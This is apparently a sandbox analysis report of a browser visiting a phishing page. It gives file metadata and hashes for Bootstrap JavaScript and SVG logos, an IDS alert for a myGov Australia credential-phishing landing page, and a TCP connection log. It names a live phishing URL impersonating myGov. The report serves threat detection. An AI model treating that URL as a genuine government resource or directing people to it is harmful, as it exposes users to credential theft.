                                                        Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):64140
                                                        Entropy (8bit):4.364003294096482
                                                        Encrypted:false
                                                        SSDEEP:768:bOLsHDCJYU28s5MBiVkYR1utxxmLhtzP4GWWT5m/tW0BhRL26WGiGy5ZGrr:bT+Jo8sifYRIaWgKVl29GiGuZU
                                                        MD5:DE646B2F77F5FA27D55A01BBB9CF584E
                                                        SHA1:33316EB871ADF6E08AF7C780EB15872549D08DC3
                                                        SHA-256:10B11A7C97B90BCF7AD520AC94C5769D08540CE1EE3B84D487C587BF128E3388
                                                        SHA-512:E9045ED1FC7C7820E37A6AE88FADB685A79A5D162676FA81360081824BB4EF63DAE66AE0D62337D81668EB83998B26EE6404FAF0FB299C03CC52E505AD027354
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 693.47 150.57"><defs><style>.cls-1{fill:#fff;}</style></defs><path class="cls-1" d="M420,22.09a8.76,8.76,0,0,0-8.76,8.76V53.51L455,97.33l-43.82,43.81v22.67A8.75,8.75,0,0,0,426.12,170l72.71-72.69L426.15,24.65a8.75,8.75,0,0,0-6.2-2.56Z" transform="translate(-23 -22)"/><path class="cls-1" d="M382.31,24.63a8.76,8.76,0,0,0-14.93,6.22V163.78a8.76,8.76,0,0,0,15,6.18l28.81-28.82V53.51L382.31,24.63Z" transform="translate(-23 -22)"/><path class="cls-1" d="M42.11,167.84,34.5,150.55h-.29l-7.54,16.82a12.72,12.72,0,0,1-1.81,3.19,3.17,3.17,0,0,1-1.86.94v.57h7v-.57a6,6,0,0,1-2.07-.38,1.4,1.4,0,0,1-.71-1.31,4.58,4.58,0,0,1,.43-1.69l.89-2.05H36l1.12,2.63c.29.68.44,1.07.46,1.16a2,2,0,0,1,.1.58.82.82,0,0,1-.35.71,3.13,3.13,0,0,1-1.72.35h-.42v.57h10.2v-.57a2.41,2.41,0,0,1-1.49-.57,10.4,10.4,0,0,1-1.79-3.09Zm-13-2.92,3.24-7.26,3.14,7.26Z" transform="translate(-23 -22)"/><path class="cls-1" d="M58.31,168.92V157.53H52.39v.58
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):64143
                                                        Entropy (8bit):4.363849395431494
                                                        Encrypted:false
                                                        SSDEEP:768:pOLsHDCJYU28s5MBiVkYR1utxxmLhtzP4GWWT5m/tW0BhRL26WGiGy5ZGrr:pT+Jo8sifYRIaWgKVl29GiGuZU
                                                        MD5:B53F20300BABCA4EBB422E59B888BE1F
                                                        SHA1:699C5898C6DD9D2B8B949DB2E13C8F0B0D29E26B
                                                        SHA-256:954AA858B3BFFB8511BC41BC88B07D2B24597C37FAF522550E26C9AA3B0D220D
                                                        SHA-512:3C8417A8C6B689A876633C18F00558B89334F5BCAF8FCD0242D4ED3120BDC0EEBC1F1981642C7337C3F690FBC7B243FD61F08220BC7C0BC3BCB2B2AC8C9AE5A1
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://yungbucksbbq.com/portbiz/images/myGov-cobranded-logo-black.svg
                                                        Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 693.47 150.57"><defs><style>.cls-1{fill:#231f20;}</style></defs><path class="cls-1" d="M420,22.09a8.76,8.76,0,0,0-8.76,8.76V53.51L455,97.33l-43.82,43.81v22.67A8.75,8.75,0,0,0,426.12,170l72.71-72.69L426.15,24.65a8.75,8.75,0,0,0-6.2-2.56Z" transform="translate(-23 -22)"/><path class="cls-1" d="M382.31,24.63a8.76,8.76,0,0,0-14.93,6.22V163.78a8.76,8.76,0,0,0,15,6.18l28.81-28.82V53.51L382.31,24.63Z" transform="translate(-23 -22)"/><path class="cls-1" d="M42.11,167.84,34.5,150.55h-.29l-7.54,16.82a12.72,12.72,0,0,1-1.81,3.19,3.17,3.17,0,0,1-1.86.94v.57h7v-.57a6,6,0,0,1-2.07-.38,1.4,1.4,0,0,1-.71-1.31,4.58,4.58,0,0,1,.43-1.69l.89-2.05H36l1.12,2.63c.29.68.44,1.07.46,1.16a2,2,0,0,1,.1.58.82.82,0,0,1-.35.71,3.13,3.13,0,0,1-1.72.35h-.42v.57h10.2v-.57a2.41,2.41,0,0,1-1.49-.57,10.4,10.4,0,0,1-1.79-3.09Zm-13-2.92,3.24-7.26,3.14,7.26Z" transform="translate(-23 -22)"/><path class="cls-1" d="M58.31,168.92V157.53H52.39v
                                                        No static file info
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-25T02:23:10.180447+01002053843ET PHISHING MyGovAU Credential Phish Landing Page 2024-06-241104.21.112.1443192.168.2.449747TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 25, 2024 02:22:57.586200953 CET49675443192.168.2.4173.222.162.32
                                                        Dec 25, 2024 02:22:59.625442028 CET49737443192.168.2.4172.217.19.228
                                                        Dec 25, 2024 02:22:59.625525951 CET44349737172.217.19.228192.168.2.4
                                                        Dec 25, 2024 02:22:59.625612974 CET49737443192.168.2.4172.217.19.228
                                                        Dec 25, 2024 02:22:59.625821114 CET49737443192.168.2.4172.217.19.228
                                                        Dec 25, 2024 02:22:59.625849962 CET44349737172.217.19.228192.168.2.4
                                                        Dec 25, 2024 02:23:01.333451033 CET44349737172.217.19.228192.168.2.4
                                                        Dec 25, 2024 02:23:01.333734989 CET49737443192.168.2.4172.217.19.228
                                                        Dec 25, 2024 02:23:01.333772898 CET44349737172.217.19.228192.168.2.4
                                                        Dec 25, 2024 02:23:01.335431099 CET44349737172.217.19.228192.168.2.4
                                                        Dec 25, 2024 02:23:01.335514069 CET49737443192.168.2.4172.217.19.228
                                                        Dec 25, 2024 02:23:01.336679935 CET49737443192.168.2.4172.217.19.228
                                                        Dec 25, 2024 02:23:01.336772919 CET44349737172.217.19.228192.168.2.4
                                                        Dec 25, 2024 02:23:01.384809971 CET49737443192.168.2.4172.217.19.228
                                                        Dec 25, 2024 02:23:01.384830952 CET44349737172.217.19.228192.168.2.4
                                                        Dec 25, 2024 02:23:01.431700945 CET49737443192.168.2.4172.217.19.228
                                                        Dec 25, 2024 02:23:02.184031963 CET49739443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:02.184137106 CET44349739104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:02.184237957 CET49739443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:02.184632063 CET49740443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:02.184690952 CET44349740104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:02.184799910 CET49740443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:02.184961081 CET49739443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:02.184994936 CET44349739104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:02.185235023 CET49740443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:02.185249090 CET44349740104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.405544996 CET44349740104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.405936956 CET49740443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.405968904 CET44349740104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.407556057 CET44349740104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.407620907 CET49740443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.412014008 CET44349739104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.413033009 CET49740443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.413063049 CET49740443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.413119078 CET44349740104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.413132906 CET49740443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.413167000 CET49740443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.413705111 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.413727999 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.413788080 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.414107084 CET49739443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.414154053 CET44349739104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.414280891 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.414299965 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.415822029 CET44349739104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.415898085 CET49739443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.424398899 CET49739443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.424504995 CET44349739104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.424612999 CET49739443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.424632072 CET44349739104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.424715996 CET49739443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.424715996 CET49739443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.424925089 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.424972057 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:03.425026894 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.425487995 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:03.425504923 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.779136896 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.779382944 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:04.779396057 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.780291080 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.780303001 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.780368090 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:04.780505896 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:04.780535936 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.781364918 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:04.781445980 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.781563997 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:04.781572104 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.784069061 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.784142971 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:04.784421921 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:04.784595013 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.823797941 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:04.826948881 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:04.826965094 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:04.873420954 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.393589973 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.393661976 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.393788099 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.393799067 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.393877983 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.393910885 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.393976927 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.393987894 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.394058943 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.401802063 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.411938906 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.412169933 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.412245035 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.412254095 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.412319899 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.513130903 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.544734001 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:05.544765949 CET4434974435.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.544831038 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:05.546941042 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:05.546958923 CET4434974435.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.567856073 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.567862988 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.585658073 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.585762978 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.585771084 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.596709967 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.596735954 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.596826077 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.596868038 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.596878052 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.597426891 CET49741443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.597439051 CET44349741104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.621473074 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.622791052 CET49745443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.622817039 CET44349745104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.623527050 CET49745443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.624180079 CET49745443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:05.624195099 CET44349745104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:05.663367033 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.225369930 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.225711107 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.225799084 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.253247023 CET49742443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.253264904 CET44349742104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.279721022 CET49746443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.279753923 CET44349746104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.279828072 CET49746443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.280121088 CET49746443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.280133963 CET44349746104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.762248993 CET4434974435.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.762557030 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:06.762586117 CET4434974435.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.763477087 CET4434974435.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.763542891 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:06.764614105 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:06.764672995 CET4434974435.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.764875889 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:06.764883995 CET4434974435.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.817740917 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:06.877686024 CET44349745104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.877914906 CET49745443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.877924919 CET44349745104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.878792048 CET44349745104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.878854036 CET49745443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.879159927 CET49745443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.879179955 CET49745443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.879215956 CET44349745104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.879237890 CET49745443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.879270077 CET49745443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.879553080 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.879581928 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:06.879648924 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.879842997 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:06.879856110 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.218462944 CET4434974435.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.218558073 CET4434974435.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.218620062 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:07.218725920 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:07.218744993 CET4434974435.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.218755007 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:07.218791008 CET49744443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:07.219201088 CET49748443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:07.219238043 CET4434974835.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.219299078 CET49748443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:07.219504118 CET49748443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:07.219512939 CET4434974835.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.496660948 CET44349746104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.496911049 CET49746443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:07.496957064 CET44349746104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.498395920 CET44349746104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.498467922 CET49746443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:07.498764992 CET49746443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:07.498764992 CET49746443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:07.498815060 CET49746443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:07.498862028 CET44349746104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.498929024 CET49746443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:07.499124050 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:07.499164104 CET44349749104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:07.499221087 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:07.499388933 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:07.499402046 CET44349749104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.093837023 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.094101906 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.094183922 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.095624924 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.095698118 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.096003056 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.096092939 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.096143961 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.135551929 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.135575056 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.182426929 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.430675030 CET4434974835.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.430985928 CET49748443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:08.430999994 CET4434974835.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.431277037 CET4434974835.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.431571960 CET49748443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:08.431615114 CET4434974835.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.432113886 CET49748443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:08.479332924 CET4434974835.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.715440035 CET44349749104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.715828896 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.715842009 CET44349749104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.717356920 CET44349749104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.717433929 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.717792034 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.717873096 CET44349749104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.717988014 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.717994928 CET44349749104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.762418985 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:08.903418064 CET4434974835.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.903548002 CET4434974835.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.903603077 CET49748443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:08.903743982 CET49748443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:08.903753996 CET4434974835.190.80.1192.168.2.4
                                                        Dec 25, 2024 02:23:08.903769970 CET49748443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:08.903800011 CET49748443192.168.2.435.190.80.1
                                                        Dec 25, 2024 02:23:09.155414104 CET44349749104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:09.155590057 CET44349749104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:09.155659914 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:09.155940056 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:09.155949116 CET44349749104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:09.155961037 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:09.156003952 CET49749443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:09.157494068 CET49751443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:09.157511950 CET44349751104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:09.157598972 CET49751443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:09.157908916 CET49751443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:09.157921076 CET44349751104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.163731098 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.163794041 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.163831949 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.163866997 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.163991928 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.164028883 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.164037943 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.164357901 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.164397955 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.164405107 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.171963930 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.172013044 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.172025919 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.180244923 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.180291891 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.180299044 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.180330038 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.180371046 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.187958956 CET49752443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.188005924 CET44349752104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.188074112 CET49752443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.188886881 CET49752443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.188905001 CET44349752104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.191250086 CET49753443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.191358089 CET44349753104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.191422939 CET49753443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.191854000 CET49753443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.191890955 CET44349753104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.192341089 CET49754443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.192353010 CET44349754104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.192414045 CET49754443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.192646980 CET49754443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.192665100 CET44349754104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.193402052 CET49755443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.193425894 CET44349755104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.193483114 CET49755443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.193954945 CET49755443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.193981886 CET44349755104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.195254087 CET49747443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.195271015 CET44349747104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.203025103 CET49756443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.203069925 CET44349756104.21.112.1192.168.2.4
                                                        Dec 25, 2024 02:23:10.203125000 CET49756443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.205471039 CET49756443192.168.2.4104.21.112.1
                                                        Dec 25, 2024 02:23:10.205490112 CET44349756104.21.112.1192.168.2.4
